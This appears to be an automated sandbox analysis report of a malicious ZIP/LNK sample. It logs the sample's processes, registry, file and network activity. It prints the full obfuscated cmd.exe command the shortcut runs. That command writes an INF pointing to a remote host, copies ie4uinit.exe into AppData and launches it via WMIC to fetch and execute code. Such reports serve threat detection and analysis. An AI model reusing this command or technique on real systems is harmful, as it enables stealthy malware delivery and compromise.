Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Sample Name:	Education and Experience.lnk(1).zip
Analysis ID:	16737
MD5:	254c94d8e782c1e10fd3021b56638bc7
SHA1:	cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:	af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Very long command line found

Creates processes via WMI

Contains functionality to create processes via WMI

Drops PE files

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

Creates COM task schedule object (often to register a task for autostart)

PE file contains sections with non-standard names

Binary contains a suspicious time stamp

Sample execution stops while process was sleeping (likely an evasion)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=

Source: unknown

DNS traffic detected: queries for: sophia-lagoon.net

Source: global traffic

System Summary

Very long command line found

Source: unknown

Process created: Commandline size = 2790

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default

Deletes files inside the Windows folder

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File deleted: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" \| set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" \| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: classification engine

Classification label: mal52.evad.winZIP@23/9@1/1

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office

Jump to behavior

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr

PE file contains sections with non-standard names

Source: ie4uinit.exe.14.dr

Static PE information: section name: .didat

Binary contains a suspicious time stamp

Source: ie4uinit.exe.14.dr

Static PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Jump to dropped file

Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
